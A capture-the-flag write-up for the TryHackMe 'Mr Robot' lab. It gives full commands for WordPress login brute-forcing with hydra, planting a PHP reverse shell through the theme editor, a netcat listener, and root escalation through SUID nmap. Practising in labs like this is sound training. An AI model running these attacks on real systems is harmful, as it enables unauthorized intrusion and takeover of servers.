Hello everyone. I’m Rahmos. Here is my Mr-Robot — TryHackMe — WriteUp. Check it out!
1/ The first key
First of all, let’s nmap the <ip> to see which port is opened.
nmap -A -T4 -p- vv<ip>
You can see there are port 80 and 443 are opened. Which means that an Apache web server is currently running under this machine.
So let’s check the website at port 80:
It first shows up a video, and some commands. It’s not really useful for me to find information.
Take a look at the “Hint”, it says “Robots”. Let’s go to “http://<ip>/robots.txt”
Here, I can see our the key: key-1-of-3.txt
Go to “http://<ip>/key-1-of-3.txt”
2/ The second key
The “Hint” says: White color font. Not really clear, right? So let’s find out.
Roll back to robots.txt, there is a file call “fsocity.dic”. Let’s download the file using wget
wget -O robotpasswd.txt http://<ip>/fsocity.dic
*I choose robotpasswd.txt as my filename, you can choose any name you want.
Take a look at the file I’ve just downloaded. It looks like a large password file. So up next, I need to brute the password.
However, which page I’m gonna login? Let’t use dirbuster to search for hidden directories of the website.
Alternatively you can use gobuster if you prefer CLI. Here’s the command:
gobuster dir -u http://<ip> -w /path-to-wordlist
Here, you can see a wp-login page response status code 200, which means we can access this page. Moreover, we know that this page is using Wordpress.
Access “http://<ip>/wp-login.php”. I can now brute the username and password using Hydra
I need to get the http post form first, cause Hydra requires that information to operate.
Using Burpsuite to intercept request, I can get the http-post-form. Just enter any username and password to login.
The login page gives the notification: “Invalid username”. Note that for Hydra.
Now, let’s use Hydra to get the username first:
hydra -L robotpasswd.txt -p test <ip> http-post-form “/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username” -t 30 -I -f
I’ve got the username “Elliot”. Try to use this username to login.
A different notification for wrong password. Note that for Hydra.
Now let’s Hydra the password!
hydra -l Elliot -P robotpasswd.txt <ip> http-post-form “/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username” -I -f
Wait a while and I’ve got the correct password: ER28–0652
Login to page and now I can access the admin page:
Now, let’s find a way to upload php-reverse-shell to the webpage.
In wp-admin, go to left navigation bar and select
Appearance → Editor and then select
Archives (archive.php) on the right
Paste the content of php-reverse-shell to archive.php
*Remember to change the <ip> address to your openVPN address of Tryhackme. You can find it by accessing: 10.10.10.10 in your browser.
Click Update and let’s open netcat to listen to the port 1234.
nc -lvnp 1234
and I’ve got the reverse shell into the machine!
Spawn a tty shell using Python:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Move around to see files:
You can see the “key-2-of-3.txt.” However, I cannot read this file as “daemon”. So let’s crack robot’s password using the file “password.raw-md5”.
Copy the MD5 hash and go to this link to decrypt robot’s password:
Now let’s su robot using the password above. Got the 2nd key!
3/ The final key
Let’s move to the final key. Look at the hint, it says “nmap”. So I know that I can priv escalation using nmap. Use “find” to look for SUID:
find / -perm -u=s -type f 2>/dev/null
Here you can see nmap! Open an interactive shell using nmap:
nmap — interactive
Run this command to get root:
Now i’m root!
Let’s cd to /root and get the final key!